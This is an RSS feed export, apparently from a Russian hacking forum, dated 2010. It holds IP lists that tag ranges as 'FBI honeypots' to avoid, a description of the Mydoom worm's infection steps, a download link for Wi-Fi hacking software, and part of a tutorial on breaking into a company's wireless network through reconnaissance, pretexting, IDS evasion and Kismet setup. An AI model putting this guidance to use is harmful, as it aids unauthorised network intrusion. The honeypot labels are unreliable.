- 207.60.94.207 Donnegan System (NETBLK-TIAC-DYST384-2) &lt;br /&gt;207.60.95.1 - 207.60.95.255 The Iprax Corp. (NETBLK-TIAC-IPRAX56K) &lt;br /&gt;207.60.102.0 - 207.60.102.63 Coporate IT (NETBLK-TIAC-CIT) &lt;br /&gt;207.60.102.64 - 207.60.102.127 Putnam Technologies (NETBLK-TIAC-PUTTECH) &lt;br /&gt;207.60.102.128 - 207.60.102.191 Sycamore Networks, Inc (NETBLK-TIAC-SYCAISDN) &lt;br /&gt;207.60.102.192 - 207.60.102.255 Bostek (NETBLK-TIAC-BOSTEK) &lt;br /&gt;207.60.103.128 - 207.60.103.255 Louis Berger and Associates (NETBLK-TIAC-BERGISDN) &lt;br /&gt;207.60.104.128 - 207.60.104.191 Hanson Data Systems (NETBLK-TIAC-HHANSON) &lt;br /&gt;207.60.106.128 - 207.60.106.255 Giganet Inc. (NETBLK-TIAC-GIGANET-3) &lt;br /&gt;207.60.107.0 - 207.60.107.255 Roll Systems (NETBLK-TIAC-ROLLISDN) &lt;br /&gt;207.60.108.8 - 207.60.108.15 InternetQA (NETBLK-TIAC-EBENNETT) &lt;br /&gt;207.60.111.0 - 207.60.111.31 Reading Cooperative Bank (NETBLK-TIAC-READ56K) &lt;br /&gt;207.60.111.32 - 207.60.111.63 Edco collaborative (NETBLK-TIAC-EDCOT1) &lt;br /&gt;207.60.111.64 - 207.60.111.95 DTC Communications Inc (NETBLK-TIAC-DTCCOM2) &lt;br /&gt;207.60.111.96 - 207.60.111.127 Mike Line (NETBLK-TIAC-MLINE ) &lt;br /&gt;207.60.111.128 - 207.60.111.159 The Steppingstone Foundation (NETBLK-TIAC-STEP56) &lt;br /&gt;207.60.111.160 - 207.60.111.191 Caton Connector (NETBLK-TIAC-CATON118K) &lt;br /&gt;207.60.111.192 - 207.60.111.223 Refron, Inc (NETBLK-TIAC-REFRON1 ) &lt;br /&gt;207.60.111.224 - 207.60.111.255 Dolabany Comm Group (NETBLK-TIAC-DCGDED99) &lt;/p&gt;
						&lt;p&gt;207.60.112.0 - 207.60.112.255 &lt;br /&gt;207.60.116.0 - 207.60.116.255 &lt;br /&gt;207.60.122.16 - 207.60.122.23 &lt;br /&gt;207.60.122.24 - 207.60.122.31 &lt;br /&gt;207.60.122.32 - 207.60.122.39 &lt;br /&gt;207.60.122.40 - 207.60.122.47 &lt;br /&gt;207.60.122.48 - 207.60.122.55 &lt;br /&gt;207.60.122.56 - 207.60.122.63 &lt;br /&gt;207.60.122.64 - 207.60.122.71 &lt;br /&gt;207.60.122.72 - 207.60.122.79 &lt;br /&gt;207.60.122.80 - 207.60.122.87 &lt;br /&gt;207.60.122.88 - 207.60.122.95 &lt;br /&gt;207.60.122.96 - 207.60.122.103 &lt;br /&gt;207.60.122.104 - 207.60.122.111 &lt;br /&gt;207.60.127.0 &lt;br /&gt;207.60.128.0 - 207.60.128.255 &lt;br /&gt;207.60.129.0 - 207.60.129.255 &lt;br /&gt;207.60.129.64 - 207.60.129.127 &lt;br /&gt;207.60.129.128 - 207.60.129.191 &lt;br /&gt;207.60.129.192 - 207.60.129.255 &lt;br /&gt;207.205. * Earthlink, USA &lt;br /&gt;207.226.*.* : Mobilcom &lt;br /&gt;208.171. [Computer Lynx, USA &lt;br /&gt;209.35.* : (FBI&#039;s honeypot) &lt;br /&gt;212.28.*.* : Agri (Schweiz) &lt;br /&gt;212.35.*.* : DiaX (Schweiz) &lt;br /&gt;212.46. [Chello, Netherlands &lt;br /&gt;212.56.107.22 : (FBI&#039;s honeypot) &lt;br /&gt;212.61. * IAEhv, Netherlands &lt;br /&gt;212.64 [Casema, Netherlands &lt;br /&gt;212.81.*.* : Mobilcom &lt;br /&gt;212.83. [Chello, Netherlands &lt;br /&gt;212.92. [Chello, Netherlands &lt;br /&gt;212.120. * @Home, Netherlands &lt;br /&gt;212.123. [Pandora, Belgium] &lt;br /&gt;212.127. [Sonera, Netherlands &lt;br /&gt;212.136.74.* : UUNet &lt;br /&gt;212.136.77.* : UUNet &lt;br /&gt;212.136.128.*:UUNet &lt;br /&gt;212.136.129.*:UUNet &lt;br /&gt;212.142. [Chello, Netherlands &lt;br /&gt;212.153.255.*:UUNet &lt;br /&gt;212.159.0.2 : (FBI&#039;s honeypot) &lt;br /&gt;212.159.0.2 : (FBI&#039;s honeypot) &lt;br /&gt;212.159.1.1 : (FBI&#039;s honeypot) &lt;br /&gt;212.159.1.4 : (FBI&#039;s honeypot) &lt;br /&gt;212.159.1.5 : (FBI&#039;s honeypot) &lt;br /&gt;212.159.33.56 : (FBI&#039;s honeypot) &lt;br /&gt;212.159.40.211 : (FBI&#039;s honeypot) &lt;br /&gt;212.159.41.173 : (FBI&#039;s honeypot) &lt;br /&gt;212.159.1.1 &lt;br /&gt;212.159.1.4 &lt;br /&gt;212.159.1.5 &lt;/p&gt;
						&lt;p&gt;212.159.0.2 &lt;br /&gt;212.159.1.1 &lt;br /&gt;212.159.1.4 &lt;br /&gt;212.159.1.5 &lt;br /&gt;212.159.33.56 &lt;br /&gt;212.159.40.211 &lt;br /&gt;212.159.41.173 &lt;br /&gt;212.159.0.2 &lt;br /&gt;212.159.1.1 &lt;br /&gt;212.159.1.4 &lt;br /&gt;212.159.1.5 &lt;br /&gt;212.172.*.* : Nacamar &lt;br /&gt;212.177.114.*:UUNet &lt;br /&gt;212.181.*.* : 1 &amp;amp; 1 &lt;br /&gt;212.186. [Chello, Austria] &lt;br /&gt;212.187. [Chello, Netherlands &lt;br /&gt;212.202.*.* : Germany Net &lt;br /&gt;212.204 [@Home, Netherlands &lt;br /&gt;212.254.*.* : Sunrise (Schweiz) &lt;br /&gt;213.2. ? &lt;br /&gt;213.3. * Bluewin, Germany &lt;br /&gt;213.4. * Telefonica, Spain &lt;br /&gt;213.5. * Altec, Greece &lt;br /&gt;213.6. * PPPool, Germany &lt;br /&gt;213.7. ? &lt;br /&gt;213.8. ? &lt;br /&gt;213.9. * Webtris Online Games, Germany &lt;br /&gt;213.10. * Planet Internet, Netherlands &lt;br /&gt;213.11. ? &lt;br /&gt;213.12. ? &lt;br /&gt;213.13. ? &lt;br /&gt;213.14. ? &lt;br /&gt;213.15. ? &lt;br /&gt;213.16. * L&#039;Outremere, France &lt;br /&gt;213.17. * Casema, Netherlands &lt;br /&gt;213.18. ? &lt;br /&gt;213.19. * World Online, France &lt;br /&gt;213.20. ? &lt;br /&gt;213.21. ? &lt;br /&gt;213.22. ? &lt;br /&gt;213.23. * Mannesman Arcor, Germany &lt;br /&gt;213.24. * IZHCom, Russia &lt;br /&gt;213.25. ? &lt;br /&gt;213.26. ? &lt;br /&gt;213.27. ? &lt;br /&gt;213.28. ? &lt;br /&gt;213.29. ? &lt;br /&gt;213.30. * Netc, Spain &lt;br /&gt;213.31. ? &lt;br /&gt;213.32. ? &lt;br /&gt;213.33. * Enter Telekom, Austria &lt;br /&gt;213.34. * Kennisnet, Netherlands &lt;br /&gt;213.35. * 24Hours, Netherlands &lt;br /&gt;213.36. * LibertySurf, France &lt;br /&gt;213.37. ? &lt;br /&gt;213.38. * Internet Network Services, UK &lt;br /&gt;213.39. ? &lt;br /&gt;213.40. ? &lt;br /&gt;213.41. * Colt, France &lt;br /&gt;213.42. * Emirates Telecom Corporation &lt;br /&gt;213.43. ? &lt;br /&gt;213.44. * Club Internet, France &lt;br /&gt;213.45. ? &lt;br /&gt;213.46. [Chello, Netherlands &lt;br /&gt;213.47. ? &lt;br /&gt;213.48. ? &lt;br /&gt;213.49. ? &lt;br /&gt;213.50. * Sonera, Finland &lt;br /&gt;213.51. [@Home, Netherlands &lt;br /&gt;213.52. * OneNet S.L., Spain &lt;br /&gt;213.53. * UUNET, Netherlands &lt;br /&gt;213.54. * TiscaliNet, Germany &lt;br /&gt;213.55. ? &lt;br /&gt;213.56. * D&#039;Olйane, France &lt;br /&gt;213.57. ? &lt;br /&gt;213.58. ? &lt;br /&gt;213.59. * RTComm.ru &lt;br /&gt;213.60. ? &lt;br /&gt;213.61. * Colt, Germany &lt;br /&gt;213.62. ? &lt;br /&gt;213.63. * JazzNet, Protugal &lt;br /&gt;213.64. [Telia, Sweden] &lt;br /&gt;213.65. ? &lt;br /&gt;213.66. ? &lt;br /&gt;213.67. ? &lt;br /&gt;213.68. ? &lt;br /&gt;213.69. ? &lt;br /&gt;213.70. ? &lt;br /&gt;213.71. ? &lt;br /&gt;213.72. ? &lt;br /&gt;213.73. ? &lt;br /&gt;213.74. ? &lt;br /&gt;213.75. * Planet Internet, Netherlands &lt;br /&gt;213.76. ? &lt;br /&gt;213.77. ? &lt;br /&gt;213.78. ? &lt;br /&gt;213.79. ? &lt;br /&gt;213.80. ? &lt;br /&gt;213.81. ? &lt;br /&gt;213.82. ? &lt;br /&gt;213.83. ? &lt;br /&gt;213.84. * XS4ALL, Netherlands &lt;br /&gt;213.85. ? &lt;br /&gt;213.86. ? &lt;br /&gt;213.87. ? &lt;br /&gt;213.88. ? &lt;br /&gt;213.89. ? &lt;br /&gt;213.90. * Netway Communications, Austria &lt;br /&gt;213.91. * France Teaser &lt;br /&gt;213.92. ? &lt;br /&gt;213.93. * Chello, Netherlands &lt;br /&gt;213.94. ? &lt;br /&gt;213.95. ? &lt;br /&gt;213.96. ? &lt;br /&gt;213.97. ? &lt;br /&gt;213.98. ? &lt;br /&gt;213.99. ? &lt;br /&gt;213.100. * The Swedish IP Network &lt;br /&gt;213.101. ? &lt;br /&gt;213.102. ? &lt;br /&gt;213.103. ? &lt;br /&gt;213.104. ? &lt;br /&gt;213.105. * NTL, UK &lt;br /&gt;213.106. ? &lt;br /&gt;213.107. ? &lt;br /&gt;213.108. * Business Online, UK &lt;br /&gt;213.109. ? &lt;br /&gt;213.110. ? &lt;br /&gt;213.111. ? &lt;br /&gt;213.112. ? &lt;br /&gt;213.113. ? &lt;br /&gt;213.114. ? &lt;br /&gt;213.115. ? &lt;br /&gt;213.116. * UUNET, Denmark &lt;br /&gt;213.117. ? &lt;br /&gt;213.118. ? &lt;br /&gt;213.119. ? &lt;br /&gt;213.120. * BTClick, UK &lt;br /&gt;213.121. ? &lt;br /&gt;213.122. ? &lt;br /&gt;213.123. * OnMail, UK &lt;br /&gt;213.124. ? &lt;br /&gt;213.125. ? &lt;br /&gt;213.126. ? &lt;br /&gt;213.127. ? &lt;br /&gt;213.128. ? &lt;br /&gt;213.129. * UUNET, Denmark &lt;br /&gt;213.130. * Farlep Internet, Ukraine &lt;br /&gt;213.131. * Moscow State University, Russia &lt;br /&gt;213.132. ? &lt;br /&gt;213.133. * Spinn, Denmark &lt;br /&gt;213.134. * Nextra, Hungary &lt;br /&gt;213.135. * Intersaar, Germany &lt;br /&gt;213.136. ? &lt;br /&gt;213.137. ? &lt;br /&gt;213.138. ? &lt;br /&gt;213.139. * Easynet, Spain &lt;br /&gt;213.140. ? &lt;br /&gt;213.141. * JazzNet, Portugal &lt;br /&gt;213.142. * RSL COM, Spain &lt;br /&gt;213.143. ? &lt;br /&gt;213.144. * TelemaX, Germany &lt;br /&gt;213.145. ? &lt;br /&gt;213.146. * Werft 22, Germany &lt;br /&gt;213.147. * Sybcom, Germany &lt;br /&gt;213.148. * NOC Communication InterNet, Russia &lt;br /&gt;213.149. * Strona Glуwna, Poland &lt;br /&gt;213.150. * IT Austria &lt;br /&gt;213.151. ? &lt;br /&gt;213.152. * INTERSAT S.A., Greece &lt;br /&gt;213.153. ? &lt;br /&gt;213.154. * On:Line Finance, UK &lt;br /&gt;213.155. ? &lt;br /&gt;213.156. * Pine Internet, Netherlands &lt;br /&gt;213.157. * HEAG MediaNet, Germany &lt;br /&gt;213.158. * St. Petersburg Web, Russia &lt;br /&gt;213.159. ? &lt;br /&gt;213.160. * Compoint, Germany &lt;br /&gt;213.161. * KKS Online, Slovenia &lt;br /&gt;213.162. ? &lt;br /&gt;213.163. * VIVENDI Telecom, Hungary &lt;br /&gt;213.164. * Colt, Austria &lt;br /&gt;213.165. ? &lt;br /&gt;213.166. * Band-X-Routed, UK &lt;br /&gt;213.167. ? &lt;br /&gt;213.168. * EESTI Telefon, Estonia &lt;br /&gt;213.169. * Cabinet IT, Finland &lt;br /&gt;213.170. * Knowtion.net &lt;br /&gt;213.171. ? &lt;br /&gt;213.172. * ComSet, Russia &lt;br /&gt;213.173. * Yendor.net &lt;br /&gt;213.174. * Bulgarian Industrial Association &lt;br /&gt;213.175. ? &lt;br /&gt;213.176. ? &lt;br /&gt;213.177. ? &lt;br /&gt;213.178. * Bressem, Germany &lt;br /&gt;213.179. ? &lt;br /&gt;213.180. * Delfi, Estonia &lt;br /&gt;213.181. ? &lt;br /&gt;213.182. * SpeedCom, USA &lt;br /&gt;213.183. * Netplace Telematic, Germany &lt;br /&gt;213.184. * Warmia and Mazury University, Poland &lt;br /&gt;213.185. ? &lt;br /&gt;213.186. ? &lt;br /&gt;213.187. * Eastlink, Germany &lt;br /&gt;213.188. * WEBONLINE, Norway &lt;br /&gt;213.189. ? &lt;br /&gt;213.190. ? &lt;br /&gt;213.191. * trans-it AG, Germany &lt;br /&gt;213.192. ? &lt;br /&gt;213.193. * Multimania, France &lt;br /&gt;213.194. * Telfort, Netherlands &lt;br /&gt;213.195. ? &lt;br /&gt;213.196. * CyberComm Internet BV, Netherlands &lt;br /&gt;213.197. [Concepts ICT, Netherlands &lt;br /&gt;213.198. ? &lt;br /&gt;213.199. * Telexis, Italy &lt;br /&gt;213.200. * Basel Kommunikation, Germany &lt;br /&gt;213.201. ? &lt;br /&gt;213.202. ? &lt;br /&gt;213.203. ? &lt;br /&gt;213.204. * UNO Communications, Italy &lt;br /&gt;213.205. * WorldOnline, Italy &lt;br /&gt;213.206. * Intensive Networks, UK &lt;br /&gt;213.207. * Bevelander, Netherlands &lt;br /&gt;213.208. ? &lt;br /&gt;213.209. ? &lt;br /&gt;213.210. ? &lt;br /&gt;213.211. ? &lt;br /&gt;213.212. ? &lt;br /&gt;213.213. * Infinito, Italy &lt;br /&gt;213.214. ? &lt;br /&gt;213.215. ? &lt;br /&gt;213.216. * Vistec, Germany &lt;br /&gt;213.217. * Augsburg, Germany &lt;br /&gt;213.218. ? &lt;br /&gt;213.219. ? &lt;br /&gt;213.220. ? &lt;br /&gt;213.221. ? &lt;br /&gt;213.222. ? &lt;br /&gt;213.223. ? &lt;br /&gt;213.224. [Pandora, Belgium] &lt;br /&gt;213.225. * Eti.at &lt;br /&gt;213.226. ? &lt;br /&gt;213.227. * supercable Andalucia, spain &lt;br /&gt;213.228. * Louis, Motorradseiten, Germany &lt;br /&gt;213.229. ? &lt;br /&gt;213.230. ? &lt;br /&gt;213.231. ? &lt;br /&gt;213.232. * ADA-NET, Turkey &lt;br /&gt;213.233. ? &lt;br /&gt;213.234. * CATalunya Neutral Internet eXchange (CATNIX), Spain &lt;br /&gt;213.235. ? &lt;br /&gt;213.236. ? &lt;br /&gt;213.237. * WorldOnline, Denmark &lt;br /&gt;213.238. ? &lt;br /&gt;213.239. ? &lt;br /&gt;213.240. * EUnet, Yugoslavia &lt;br /&gt;213.241. * Polbox, Poland &lt;br /&gt;213.242. ? &lt;br /&gt;213.243. ? &lt;br /&gt;213.244. ? &lt;/p&gt;
						&lt;p&gt;216.25.* : REAL DANGEROUS &lt;br /&gt;216.247.* : REAL DANGEROUS &lt;br /&gt;216.248.*.* &lt;br /&gt;217.6.*.* :&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Thu, 07 Jan 2010 18:20:08 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=25#p25</guid>
		</item>
		<item>
			<title>Online сайты для расшифровки MD5 хешей</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=24#p24</link>
			<description>&lt;p&gt;незачто=)))&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Thu, 07 Jan 2010 18:16:43 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=24#p24</guid>
		</item>
		<item>
			<title>3127 trojan =&gt; W32.Mydoom</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=22#p22</link>
			<description>&lt;p&gt;W32.Mydoom.AH@mm - это червь массовой рассылки, который эксплуатирует уязвимость удаленного переполнения буфера в Microsoft Internet Explorer в тэге IFRAME. Распространяется червь, рассылая себя по email адресам, которые найдет на зараженном компьютере.&lt;/p&gt;
						&lt;p&gt;При запуске W32.Mydoom.AH@mm выполняет следующие действия:&lt;/p&gt;
						&lt;p&gt;1. Создает файл %System%\[random name]32.exe.&lt;/p&gt;
						&lt;p&gt;2. Добавляет значение:&lt;/p&gt;
						&lt;p&gt;&amp;quot;Reactor5&amp;quot; = &amp;quot;%System%\[random name]32.exe&amp;quot; &lt;/p&gt;
						&lt;p&gt;в ключ реестра:&lt;/p&gt;
						&lt;p&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run&lt;br /&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run &lt;/p&gt;
						&lt;p&gt;3. Может создать следующие ключи реестра:&lt;/p&gt;
						&lt;p&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\&lt;br /&gt;Explorer\ComExplore&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\&lt;br /&gt;Explorer\ComExplore\Version&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\&lt;br /&gt;Explorer\ComExplore&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\&lt;br /&gt;Explorer\ComExplore\Version &lt;/p&gt;
						&lt;p&gt;4. Удаляет следующие значения:&lt;/p&gt;
						&lt;p&gt;# center&lt;br /&gt;# reactor&lt;br /&gt;# Rhino&lt;br /&gt;# Reactor3&lt;br /&gt;# Reactor4 &lt;/p&gt;
						&lt;p&gt;из ключа реестра:&lt;/p&gt;
						&lt;p&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run &lt;/p&gt;
						&lt;p&gt;5. Пытается внедрить свой код в качестве потока в любой процесс с window class name &amp;quot;Shell_TrayWnd&amp;quot; или в любой запущенный высокоприоритетный процесс. Если это червю удалось, то он продолжает выполняться внутри зараженного процесса. Все действия, описываемые в следующих пунктах выполняет зараженный процесс, а червь становится невидимым в списке процессов в Windows Task Manager. Если червю не удалось внедрить свой код, то он продолжает выполнятьтся как собственный процесс.&lt;/p&gt;
						&lt;p&gt;6. Собирает email адреса из Windows address book и из файлов с расширениями:&lt;/p&gt;
						&lt;p&gt;# .txt&lt;br /&gt;# .htmb&lt;br /&gt;# .shtl&lt;br /&gt;# .phpq&lt;br /&gt;# .aspd&lt;br /&gt;# .dbxn&lt;br /&gt;# .tbbg&lt;br /&gt;# .adbh&lt;br /&gt;# .pl&lt;br /&gt;# .wab &lt;/p&gt;
						&lt;p&gt;7. Использует собственный SMTP механизм для того, чтобы разослать себя по найденным email адресам.&lt;/p&gt;
						&lt;p&gt;8. Открывает 1639 TCP порт для команд.&lt;/p&gt;
						&lt;p&gt;9. Пытается соединиться со следующими IRC серверами по 6667 TCP порту:&lt;/p&gt;
						&lt;p&gt;# broadway.ny.us.dal.net&lt;br /&gt;# brussels.be.eu.undernet.org&lt;br /&gt;# caen.fr.eu.undernet.org&lt;br /&gt;# ced.dal.net&lt;br /&gt;# coins.dal.net&lt;br /&gt;# diemen.nl.eu.undernet.org&lt;br /&gt;# flanders.be.eu.undernet.org&lt;br /&gt;# graz.at.eu.undernet.org&lt;br /&gt;# london.uk.eu.undernet.org&lt;br /&gt;# los-angeles.ca.us.undernet.org&lt;br /&gt;# lulea.se.eu.undernet.org&lt;br /&gt;# ozbytes.dal.net&lt;br /&gt;# qis.md.us.dal.net&lt;br /&gt;# vancouver.dal.net&lt;br /&gt;# viking.dal.net&lt;br /&gt;# washington.dc.us.undernet.org &lt;/p&gt;
						&lt;p&gt;10. Прекращает работу 16-го декабря 2004 года.&lt;/p&gt;
						&lt;p&gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Thu, 07 Jan 2010 17:41:03 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=22#p22</guid>
		</item>
		<item>
			<title>Просмотр закрытого профиля(данные анкеты)</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=15#p15</link>
			<description>&lt;div class=&quot;quote-box answer-box&quot;&gt;&lt;cite&gt;irenica написал(а):&lt;/cite&gt;&lt;blockquote&gt;&lt;p&gt;Можно установить скрипт и при заходу на страницу с приватностью будут ссылки на всё это.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;И так можно!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Tue, 05 Jan 2010 08:49:19 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=15#p15</guid>
		</item>
		<item>
			<title>Как взломать WiFi сеть... Введение</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=13#p13</link>
			<description>&lt;p&gt;&lt;strong&gt;Взлом Wi-Fi (Wi-fi Hacks) 2009 Soft&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://letitbit.net/download/3495.39acf105e0325bbf5ee6fa65f/Wifi.Hacks.2009.rar.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Mon, 04 Jan 2010 23:29:21 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=13#p13</guid>
		</item>
		<item>
			<title>Проникновение в беспроводную сеть WiFi</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=11#p11</link>
			<description>&lt;p&gt;/* Вступление */&lt;/p&gt;
						&lt;p&gt;Участники Defcon 2002 провели небольшое исследование (вообще то это больше походило на спортивное соревнование) на предмет проникновения в беспроводные сети. Изучив более 500 точек доступа в округе, они выявили интересную статистику: только около 30% беспроводных сетей защищены протоколом WEP; в каждой пятой сетке значение ESSID было выставлено «по умолчанию»; а еще было выявлено, что 20% беспроводных сетей абсолютно никак не защищены от доступа извне. На следующем Defcon 2003 эта статистика вновь подтвердилась (исследовались беспроводные сети Лас-Вегаса и Лос-Анджелеса). Такое положение дел характерно не только для США, но и для Европы, в том числе и России. Эксперты в области безопасности беспроводных сетей сходятся во мнении, что только около десяти процентов беспроводных сетей защищены чем-то большим, чем протокол WEP и фильтрацией MAC-адресов.&lt;/p&gt;
						&lt;p&gt;/* Готовимся к атаке */&lt;/p&gt;
						&lt;p&gt;Интересная статистика, не правда ли? Получается, что, имея ноутбук, кое-какие программы и немного знаний, можно проникнуть в 90% сетей 802.11. А имея более глубокие знания по беспроводным сетям и обладая некоторыми хакерскими навыками (социальной инженерией, например), процент удачных проникновений стремится к 100. Хочу поделиться с тобой некоторой информацией по этому поводу.&lt;/p&gt;
						&lt;p&gt;Что нужно для WiFi-хакинга:&lt;br /&gt;- ноутбук;&lt;br /&gt;- WiFi-карта с набором микросхем Prism2 (в принципе, можно работать и с другими, например, Hermes, но лучше все же Prism, т.к. под такие карты пишется большинство необходимого нам софта) и с возможностью подключения внешней антенны;&lt;br /&gt;- антенна, а лучше две: всенаправленная и узконаправленная;&lt;br /&gt;- автомобиль.&lt;br /&gt;Ну, это в идеале, но может пройти и такой вариант: ноутбук со встроенным модулем wifi, две ноги (еще один вариант – домашний комп + позаимствованная у друга карта + присоединенная к ней наспех сделанная своими руками направленная антенна, которую с балкона нацеливаешь на офис какой-нибудь находящийся неподалеку фирмы ; ). Не стоит также недооценивать возможности КПК, поэтому если у тебя есть наладонник с wifi-модулем (желательно iPac или Zaurus, работающие по никсами), то он может весьма пригодится.&lt;/p&gt;
						&lt;p&gt;Какую ось выбрать для этого дела? Лучше если не винду. На то есть несколько причин, но самая главная – это отсутствие нормального софта под нее. Под словом «нормального» я понимаю качественного и бесплатного. Больше всего нужных нам прог написано под линукс, но так же вполне можно найти неплохой софт под фряху. Знаю, многие сейчас могут мне возразить, утверждая, что под винду есть проги, бесплатные, которыми можно легко и непринужденно взламывать wifi-сети, имея в виду NetStumbler, Aircrack для взлома WEP. С их помощью можно взломать те самые 70% сетей, а никсы – это трата времени и т.п. и пр. Да, конечно, софтом по винду пользоваться легко и просто, но ты должен знать, что возможности того же NetStumblera весьма ограничены по сравнению, например, с Kismet под линукс, нормальный админ легко сможет защитить сеть от Нетстамблера. Для проникновения в хорошо защищенную сеть винда уж точно не годится.&lt;/p&gt;
						&lt;p&gt;/* Выбор цели */&lt;/p&gt;
						&lt;p&gt;О том, как отыскивать сети, уже написано много раз, поэтому не буду здесь все это повторять. Вардрайвишь по центру города в поисках беззащитной, находишь и взламываешь ее, и вот тебе доступен канал в инет или еще что-нибудь интересненькое. В случае чего быстро сваливаешь…&lt;/p&gt;
						&lt;p&gt;Но возможен и другой вариант: тебе нужно проникнуть в беспроводную сеть определенной организации. Ты не знаешь, насколько хорошо она защищена, с чего же начать? Первое, что необходимо предпринять - провести интернет-разведку. Нужно узнать как можно больше о том кто занимается вопросами ИТ в организации, как они этим занимаются, т.е. накопить как можно больше информации о своем противнике. Зачем это может пригодиться? Во-первых, можно нарыть кучу полезной для себя информации, касающейся используемых фирмой технологий защиты. Во-вторых, знание имен должностных лиц компании может пригодиться при использовании социнженерии.&lt;/p&gt;
						&lt;p&gt;Поищи так же информацию на вардрайверских сайтах об интересующей тебя сетке.&lt;br /&gt;Далее следует провести осмотр местности. Нужно выявить наиболее удобное место для атаки. Бывает так, что сеть никак не защищена, но присоединится к ней можно только находясь в непосредственной близости от нее. В этом случае тебе понадобится мощная остронаправленная антенна. Можно также пойти на более экстремальные действия: под каким-нибудь предлогом проникнуть внутрь здания и совершить взлом «изнутри», но в этом случае нужно сделать все «по-тихому», т.к. возможно наличие системы IDS.&lt;/p&gt;
						&lt;p&gt;/* Изучаем трафик */&lt;/p&gt;
						&lt;p&gt;Рассмотрим несколько прог для обнаружения сетей и анализа их трафика. Существует два способа обнаружения беспроводных сетей: метод активного сканирования и метод пассивного сканирования. Активное сканирование представляет собой посылку пробного запроса. В фрейме-ответе содержится такая информация как ESSID, канал передачи данных, информация о включенном или выключенном протоколе WEP, уровень сигнала, скорость передачи данных. Именно так действуют NetStumbler и MiniStumbler. Проблема в том, что админ легко может настроить точку доступа так, что она не будет отвечать на подобные запросы, таким образом, она станет невидимой для NetStumbler’а. Кроме того, сигнатурные IDS выявляют сканирование Нетстамблером, так что ты можешь привлечь к себе внимание используя его. Еще один трюк, который может предпринять админ – это посылка поддельного фрейма-ответа с заведомо несуществующими данными на твой фрейм-запрос, чтобы ввести тебя в заблуждение. Это можно реализовать, например, с помощью проги File2Air написанной Джошуа Райтом (Joshua Wright). Еще один минус активного сканирования – это высокий расход заряда аккумулятора.&lt;/p&gt;
						&lt;p&gt;Пассивное сканирование использует режим мониторинга wifi-карты. Оно состоит в перехвате трафика проходящего по всем каналам. Т.е. это сниффинг. Лучшим инструментом для пассивного сканирования, по моему мнению, является Kismet, созданная Майком Киршоу (Mike Kershaw) . По сути, эта прога предназначена для анализа трафика wifi и создания систем IDS. Kismet поддерживает все карты, умеющие работать в режиме rfmon, ее можно поставить на Linux, в том числе на дистрибутивы для КПК, FreeBSD и OpenBSD, MacOSX (и даже на винду, с помощью Cygwin’а). Найти последнюю версию Kismet можно на &lt;a href=&quot;http://www.kismetwireless.net&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.kismetwireless.net&lt;/a&gt; . Прежде чем собирать Kismet настоятельно рекомендую тебе обзавестись (если, вдруг, у тебя его нет) Ethernal’ом, который пригодится для изучения дампов, сформированных Kismet. Если у тебя есть GPS-приемник, то тогда неплохо установить еще и GpsDrive, интегрирующий с Kismet c ним. Компиляция Kismet весьма проста и не должна вызвать каких-либо сложностей. Если будет что-то непонятно, то прочитай README, там все очень подробно расписано.&lt;br /&gt;Для настройки Kismet под наши нужды открываем /usr/local/etc/kismet.conf. Здесь нужно сделать несколько вещей:&lt;br /&gt;- отключить фильтрацию MAC-адресов;&lt;br /&gt;- разрешить устанавливать соединения с IP 127.0.0.1;&lt;br /&gt;- выставить maxclient равным 1;&lt;br /&gt;- установить в значение source источник перехватываемых данных;&lt;br /&gt;- настроить интервал между операциями записи;&lt;br /&gt;- параметры noiselog и beaconlog выставь в значение false – сэкономишь место на диске;&lt;br /&gt;- если необходимо, настрой GPS;&lt;br /&gt;- не забудь наделить правами запуска Kismet пользователя, под которым ты обычно работаешь, если конечно, не собираешься работать под рутом.&lt;br /&gt;Остальные настройки не так важны для нас.&lt;/p&gt;
